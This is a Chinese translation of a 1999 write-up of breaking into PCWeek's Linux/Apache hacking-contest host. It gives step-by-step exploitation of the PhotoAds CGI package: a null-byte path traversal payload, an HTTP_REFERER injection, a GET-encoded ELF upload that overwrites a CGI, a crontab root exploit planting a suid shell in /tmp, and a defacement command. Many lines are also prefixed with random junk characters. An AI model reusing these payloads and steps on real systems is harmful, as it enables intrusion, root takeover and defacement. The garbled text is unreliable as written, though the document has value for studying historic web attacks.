JFS侵入PCWEEK-LINUX主机的详细过程

译者注：PCWeek-Linux 主机是著名电脑杂志 PCWeek 为了测试 WEB 服务器 IIS（NT平台）
, S: N/ o) ?! @" Z和 Apache（Linux平台）的安全性，提供给黑客/骇客攻击的两台主机之一。另一台主机安装
; V( S- A8 D4 @1 @! B( W( o3 G的是 IIS（NT平台）。详细情况请访问网站：http://www.hackpcweek.com/。
# G" `' [) {6 z" z! g  i6 L' |

  S/ M: S/ F4 A, c2 A) g* ?首先要进行的当然是——收集远端主机信息：打开的端口和提供的网络服务等。经过扫
描后发现大多数端口都被过滤掉了，原因可能是安装了防火墙或设置了 TCP-Wrapper 。所
以我们只能从 HTTP 服务器着手了。
+ v/ z) u. O  ~0 U# `$ t
9 a- R; a+ x+ O1 y/ q/ d1 h: u& c% qlemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
. K: _2 F* ?9 e' `" iEscape character is '^]'.
POST X HTTP/1.0

5 a) R  t+ a( M  R! YHTTP/1.1 400 Bad Request
. D) v% K! i) a' R3 O% wDate: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
( D! T9 j! c0 b1 i  ^! I% b(...)
Connection closed by foreign host.
lemming:~#

嗯，服务器操作系统是 Red Hat，WEB服务器是 Apache/1.3.6。从网页上可知服务器安
装了 mod_perl，但只有一个 fingerprint 功能，对我们没有什么用处。
' a3 }" Z2 O! W# C3 ~Apache 1.3.6 本身没有包含任何可供远端用户使用的CGI程序，但我们不清楚Red Hat
+ [/ G9 W0 Z  s% ]的发行版本中是否有，所以我们进行了一些测试（test-cgi, wwwboard, count.cgi等）。
结果令人失望。于是我们尝试找出网站的结构。经过对该网站HTML页的分析，终于找出
% G* G6 c2 W4 V; H+ Y0 \% X" X了网站DocumentRoot下的目录结构：
3 U5 l( O" ?. \
, L$ P% X% }" I/
' I/ {; E  _( J! |/cgi-bin
- v' Y, L/ O" N$ ^$ \' m+ K" V- H# R& m0 o/photoads/
; W4 C2 J: j# k7 Y( z& m3 D/photoads/cgi-bin

, @% q  r( T1 l& e+ H/ Z% L很自然地，我们的眼光落在 photoads 这个安装模块上。该商用CGI包可在"http://
www.hoffoce.com"找到，价格为$149，包括供检查和修改用的PERL源代码。
我们找到一个朋友，了解和掌握 photoads 在 Linux 平台上的安装情况，从而大致清楚
运行在该主机上的 photoads。
检查了缺省安装的文件后，我们发现可以取得所有用户名及其口令的数据库（http://
& U; J0 G1 t( ysecurelinux.hackpcweek.com/photoads/ads_data.pl），但当我们试图访问配置文件
/photoads/cgi-bin/photo_cfg.pl 时，服务器的设置拒绝了这个请求。
通过 /photoads/cgi-bin/env.cgi，我们可以知道该服务器的许多详细情况，如
! D' k" A' _  CDocumentRoot 在文件系统的位置（/home/httpd/html），运行 Apache 服务器的用户（
' A: F2 V- M% ?8 l" G* r6 J9 G0 Gnobody）等。
8 E6 c9 ]5 }1 W3 v3 J现在，开始寻找漏洞的第一步，我们尝试寻找是否存在 SSI 或 mod_perl 嵌入 HTML
命令的漏洞，如：

. J& z' L0 T! F; g% Y<!--#include file="..."--> for SSI
; W/ e* x3 A% K! V<!--#perl ...--> for mod_perl
- V9 Q2 ~8 w% ^* G
+ w  A" I  f; A2 q: `- X2 \但脚本中的匹配表达式却在许多输入域上过滤此类输入。不过与此同时我们却发现有一
/ V% [! Z# W7 V; s$ t个用户赋值的变量在转换成 HTML 代码前，并没有检查其值的合法性。我们可以通过它将命
令嵌入到由服务器端解析的 HTML 代码中：

在 post.cgi，行 36：
0 w. g( n+ b( F3 C9 d+ Vprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
7 ^2 n. \+ d' O3 X# t% [3 d3 Y& p
& Q# d/ g0 U5 I5 S$ [$ENV{'HTTP_REFERER'}是一个用户赋值的变量，我们可以通过它将任何 HTML 嵌入到代
7 n2 t# q( v1 X: Y8 o: ]. s! B码中。
请阅读我们提供的文件 getit.ssi 和 getit.mod_perl。
在命令行下使用这些文件如下：
% D, h! E" x$ @3 U  J. k' x+ C# W/ k
lemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80

但不幸的是，该主机的配置并不允许 SSI 或 mod_perl，所以我们无法利用这个方法侵
入系统。

5 ]* E+ \0 ^) w* s因此我们决定在CGI脚本中寻找缺口。在PERL脚本中许多漏洞往往出现在 open()、
& B* E  E# m. M* @system() 或 `` 等调用中，前一个允许读/写/执行，而后两个允许执行。
虽然在该主机找不到后两种调用，但我们却发现了一些 open() 调用：

lemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more
, @! A6 d) n) |8 L9 ?
advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
edit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
photo.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
photo.cgi: open ( FILE, $filename );
(...)

$BaseDir 和 $DataFile 两个变量是在配置文件中定义，且不能在运行时修改，无法被
2 e# T3 k9 v' ^  J  V我们利用。
! T- Q7 I& W* ^' f" Q% `但其余两个就……
& X8 c, u" @. u! i; D* ^, \* {) @. A
在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;
7 a0 x$ z  R- k+ R/ n9 J8 F
open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
* h9 _* Z0 x1 B2 g. `print ULFD $UPLOAD{'FILE_CONTENT'};
% w' [, G9 [. Yclose(ULFD);

: |' u8 c% o, a: r; b因此，如果我们可以修改 $write_file 变量，就可以写文件系统中的任何文件。
! M" j! m+ a6 ~  B% M  S$write_file 变量来自：
2 f; J( N# i1 Z' A
$write_file = $Upload_Dir.$filename;

其中，$Upload_Dir 在配置文件中定义，我们无法修改，但 $filename 变量又如何呢？

4 T! t( G( ?* z在 photo.cgi，行 226：
6 H* z! `- ~2 ~: \+ i8 r( Q: W  Sif( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }
1 d" B2 c) f$ S9 C
4 ?( e% W) f0 C7 L3 d$filename = lc($UPLOAD{'FILE_NAME'});
$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

# D8 @9 a& {+ y+ s/ m( g; b* H% ^if ($filename =~ m/gif/) {
4 _+ y" P0 h. x) i1 a3 u9 j$type = '.gif';
}elsif ($filename =~ m/jpg/) {
' b, r0 r0 x! W; ~* o9 W$type = '.jpg';
}else{
{&Not_Valid_Image}
$ K5 p3 ?; @! A# S' T( D}

由此可知，该变量来自从提交表格的变量组分解出来的 $UPLOAD{'FILE_NAME'}，而且必
$ a, ]% ?# l! u* ]0 n须经过匹配表达式过滤，因此我们不能用"../../../../../../../../etc/passwd"格式来取
得任何文件。匹配表达式为：

$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
. _6 {: s& e- Y& I8 A& C. ?/ M
我们看到，如 $filename 与该表达式匹配，则返回ASCII码1（SOH）。同时，变量还必
$ p' _' D2 X8 \6 J) Z& C须包含"gif"或"jpg"，以通过 Not_Valid_Image 过滤器。
经过多次尝试，以及从 Phrack 的关于PERL CGI安全性文章的帮助，我们发现以下格式
+ p7 ], \) D+ D' q# e2 O
/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif
: ?$ F4 q, q; j8 P5 a' \! \7 D" I
5 Z- x3 X1 T6 P& Q9 D可以成功修改WEB服务器根目录下的index.html文件。:-)
然而，为了上载文件，我们仍须绕过更多的脚本代码。我们发现无法通过POST方法发送
包含上述内容的表格（无法转换%00），唯一的方法只能是GET。
- D: H1 Z/ ?  Z* d  D在 photo.cgi ，行 256，会检查被上载文件的内容是否符合图像定义（宽/长/大小）
, x- \* A; k0 S' {$ G6 B（记住，photo.cgi 是被当作某个AD上载图像的一个方法）。如果不符合这些细节，脚本将
删除该上载文件。这当然不是我们所希望的！
PCWeek 网站配置文件将 Imagesize 设为 0，所以我们可以忽略该脚本中有关JPG部分，
6 J6 ]) t# g0 D% I$ @* ^而将主要精力集中在GIF上。
. F8 w9 T7 O/ n2 i5 E
; ?6 `- S% ?/ Mif ( substr ( $filename, -4, 4 ) eq ".gif" ) {
open ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
7 f3 U+ P/ A- N5 \4 dmy $pictDescFmt = "vvvvb8";
read FILE, $head, 13;
(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
, G- A) ^1 ~- s8 l2 lclose FILE;
( k) z0 J, V* M$ V/ q1 G  g$PhotoWidth = $width;
1 p; E3 ]' C* p$PhotoHeight = $height;
- X, {- g' e/ }  l$PhotoSize = $size;
return;
}

- F0 B8 H0 k0 T在 photo.cgi，行 140：
9 `3 ~0 ]6 S8 Z2 {  p. R& N# d$ M
; `# `5 m" P! N' O, d5 t2 p/ }# o( b1 fif (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
, N) ]* I% s) R. z+ F- }% ~- t. D{&Not_Valid_Image}
& n* E' S, P& f2 c+ U1 s* a0 j( O}

if ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}
' S4 T1 \' }7 R8 T
由上可知，$PhotoWidth不能大于700，不能为空，且不能大于 $ImgWidth（缺省为350）
。
) x. A' K! Y) d' J0 R( |+ T5 K% f" T所以我们使 $PhotoWidth!="" 且 $Photowidth<350 即可。
对于 $PhotoHeight，则必须小于 $ImgHeight（缺省为250）。
; G, ]; v# ?& X4 w综合以上要求，我们可以得到一个可以使用的数据：$PhotoWidth==$PhotoHeight==0。
研究提取该值的脚本后，我们唯一要做的就是将文件的第6至第9字节的值置为 ASCII 码 0
8 H9 Q, e7 F- E: z9 F（NUL）。
在确保 FILE_CONTENT（文件内容）符合以上所有要求后，我们又在以下代码遇到了另一
$ W, ]& o" N- p  N" J4 C个问题：

chmod 0755, $Upload_Dir.$filename;
: j0 o9 U. A, f$newname = $AdNum;
rename("$write_file", "$Upload_Dir/$newname");
; w0 _0 i1 g+ b
Show_Upload_Success($write_file);

哇！文件将被改名/移动（这可是我们绝对不希望的！）。
查找 $AdNum 变量的最终处理过程，我们发现它只能包含数字：
+ `% a6 e1 X# J- K, {% C
+ a9 L7 |/ f8 P  u' d+ @2 j$UPLOAD{'AdNum'} =~ tr/0-9//cd;
( Y9 S9 f  l$ E" B( [$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};
% _, k7 E7 H! P( M8 X1 z0 B: M
2 ^! W/ w' B6 C/ J其余的字符将被删除。因此我们不能直接应用"../../../"这种方法。
" e# M' I, S5 l  N' r8 c0 `! p那么，应该怎样做呢？我们看到 rename() 函数需要两个参数：旧的路径和新的路径。
哈哈，在函数过程中没有错误检查！当函数出错后将跳到下一行继续执行！那么如何才能使
3 a5 `, ?* j& ?8 |" ], y0 I该函数失败呢？Linux 内核对文件名长度限制为1024字节。因此如能使脚本将文件改名时新
2 b; f0 k) d1 W; H  S' m文件名超过1024字节长，即可绕过这个过滤器。
所以，下一步就是要向系统传递一个大约1024字节长的AD号码。但由于脚本仅允许我们
发送对应AD号码已存在的图片，而且由系统产生一个10^1024（10的1024次幂，即小数点前有
% T5 l( d) w% ?1024个数字——backend注）的AD号码要花的时间对我们来说似乎太长了。;-)
5 r) s* i) k, I/ U3 f5 h, Y我们又遇到另一个难题了！……

我们发现输入错误检查函数可以帮助我们创建一个指定的AD号码！浏览 edit.cgi 脚本
后，你也许就会想到：如果输入是一个文件名+回车符+一个1024位的数字，会产生什么结果
- n( K- Z% P3 s呢？;-)
% L: C) B# O# Z7 G请阅读用于创建新AD值的程序文件 long.adnum。
当成功绕过 $AdNum 的检查后，我们就可以让脚本创建/覆盖用户 nobody 有权写的任何
( |$ x, l( M: k2 p! `文件，其中包含了我们所希望的东西（GIF头部的NUL除外）。

& [3 ~! c5 c4 h/ w* ^7 t2 ~现在就让我们对该主机试一试这个方法。
嗯，so far so good（一切顺利）。但当我们试图让脚本改写 index.html 文件时无法
成功。:( 其中的原因可能是没有覆盖该文件的权限（该文件由root拥有）。
' r. _) W, G$ Z2 e

3 H, @6 J% o6 V- x5 Z4 V: h让我们试一下是否还有其它入侵方法……
5 w" O) \5 N! |. `
# C# R) v# P& Y! _我们决定尝试修改CGI程序，以使其按我们的意愿运行:)。这种方法还可以让我们搜寻那
; h$ A6 M, Q+ i# T些“绝密”文件，然后拿出动卖。:)
我们修改了“覆盖”脚本，并让其成功地覆盖了一个CGI！:) 为了不覆盖那些较为重要
3 K4 f1 B! s0 o) M. o的CGI（这是提高隐蔽性的聪明法子——backend注），最后我们选择了 advisory.cgi（你知
3 Y1 B% B3 @% h# E; O道它有什么用吗？:)）
现在，我们将要上载一个shell脚本，以便我们可以执行一些命令。呵呵
  Q$ F# C- p* m$ E然而，这个以CGI方式运行的shell脚本必须符合以下格式：

#!/bin/sh
9 @: G, B0 Q% e& B4 q& r7 Recho "Content-type: text/html"
find / "*secret*" -print
) [: v8 O* z- X' y: x- f
同时要记得，第6至第9字节必须为0或很小的值，以符合上面提及的大小定义……

1 q5 ?+ i& s* t7 x! z& l* S2 e* ?#!/bi\00\00\00\00n/sh
0 P/ W9 @7 d; S4 w  K
以上这种方法是行不通的，内核只会读取前5个字节（#!/bi）内容并执行。在该主机中
我们无法只用三个字节去获得一个shell。又遇到难题了！:(

' m0 S0 X; K. m2 Z$ Q让我们看一下ELF（Linux缺省可执行类型）二进制文件格式，就会发现那些位置字节的
0 j$ |6 Z" X4 d  m# H3 B内容均为0x00。:) Yohoo :)
解决了这个问题后，现在我们需要将这个ELF可执行文件上载到远端服务器中。注意，文
件内容必须经过编码，因为我们已知道只能通过GET方法上载，而不是POST。因此还要考虑到
URI的最大长度。Apache 服务器上URI最大长度设为8190字节。别忘了，我们还有一个很长的
2 K: i8 d$ x1 \4 C7 h: i' v1024字节的AD号码，所以经编码后的ELF文件长度限制为大约7000字节。

以下这个程序：

  l( e; D6 h8 i4 B# f" Ylemming:~/pcweek/hack/POST# cat fin.c
/ `( N  _' U0 K4 B2 J0 I#include <stdio.h>
main()
{
printf("Content-type: text/html\n\n\r");
fflush(stdout);
! z+ N( t- K% A2 M7 h) uexeclp("/usr/bin/find","find","/",0);
}

" S. u) W' V0 i4 i编译后：

- U7 M# B4 G. m+ A! vlemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*

优化（清除symbols）后：
3 F0 ~, l6 ]% p1 x7 U4 d
lemming:~/pcweek/hack/POST# strip fin
) q2 X% {% |, F9 x; u# d. Glemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
' n% q. N7 C9 k% B# M1 jlemming:~/pcweek/hack/POST#
9 G1 c5 z1 W* t( D. @% R6 ?  W7 e
' H+ h0 ~" U, P$ y# r" t: LURL编码后：

: i; y& ~) S. J3 s: \# Z1 K2 rlemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
% p( r* K1 c8 \8 Qlemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

这个文件大小超过了限制值。:(
我们只能自行编辑二进制文件以尽量减小文件体积。这可不是一件轻松的工作，但却有
效：

lemming:~/pcweek/hack/POST# joe fin
/ |! o/ _: x& g( g/ t9 hlemming:~/pcweek/hack/POST# ls -l fin
: ]$ {8 _6 l. r" F4 z' I: J3 g# u-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
" [( ?" G+ D5 i9 K# Tlemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
3 f6 T% O& O! b; H# rlemming:~/pcweek/hack/POST# ls -l fin.url
, p+ n8 P7 R: y& q  F- G-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
lemming:~/pcweek/hack/POST#
8 {/ U- V9 E0 L+ k8 Y
请阅读 get.sec.find文件，还有 to_url 脚本和用来运行一些基本命令的*.c文件。

, O' }8 ?0 ]. {4 a现在，将这个CGI上载到服务器，再用浏览器访问它，如：

wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
! v7 U2 B3 h/ |8 k/ @# t
2 K: z# z: U3 [' U: Z5 I1 u8 f服务器返回的结果相当于在服务器上执行 find / 命令。:)
但我们在该服务器中找不到任何“绝密”文件，或许是nobody用户无权访问的缘故。:(
我们尝试了更多的命令搜索，如ls等，但仍无法找到它们的踪影。
[我怀疑这些文件是否真的保存在该服务器上！]
3 M" E9 u" S; d' h7 a5 V. o  P

好了，现在是获取 root 权限的时候了。利用最新发现的 Red Hat crontab 漏洞就可以
轻松做到这一点。该漏洞详情请参阅 Bugtraq 或 securityfocus 上相关文档。
我们修改了源程序以适应自己的需要，因为我们不需交互式 root shell，而是创建一个
9 u' t& d4 _8 R' `用户 nobody 可访问的 suid root shell，如 /tmp/.bs。我们再次上载该CGI，并运行它，
, M- t7 T/ O  {6 K, Y) K观察其运行结果。
( M! F4 R2 r: G. H; [* r  H我们制作了执行"ls /tmp"命令的CGI，执行后确认我们已拥有了一个 suid root shell。
3 L  a- v( U: s0 C! e另外，我们还上载了一个文件 /tmp/xx，用于修改 index.html 文件。

3 X6 j1 Z. Z" [% c1 ?execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);
- a& S9 {6 j: }
好了。游戏结束！:)
总共花费了大约20个小时，还算不错！呵呵。:)

! V: {4 Y# C8 D+ t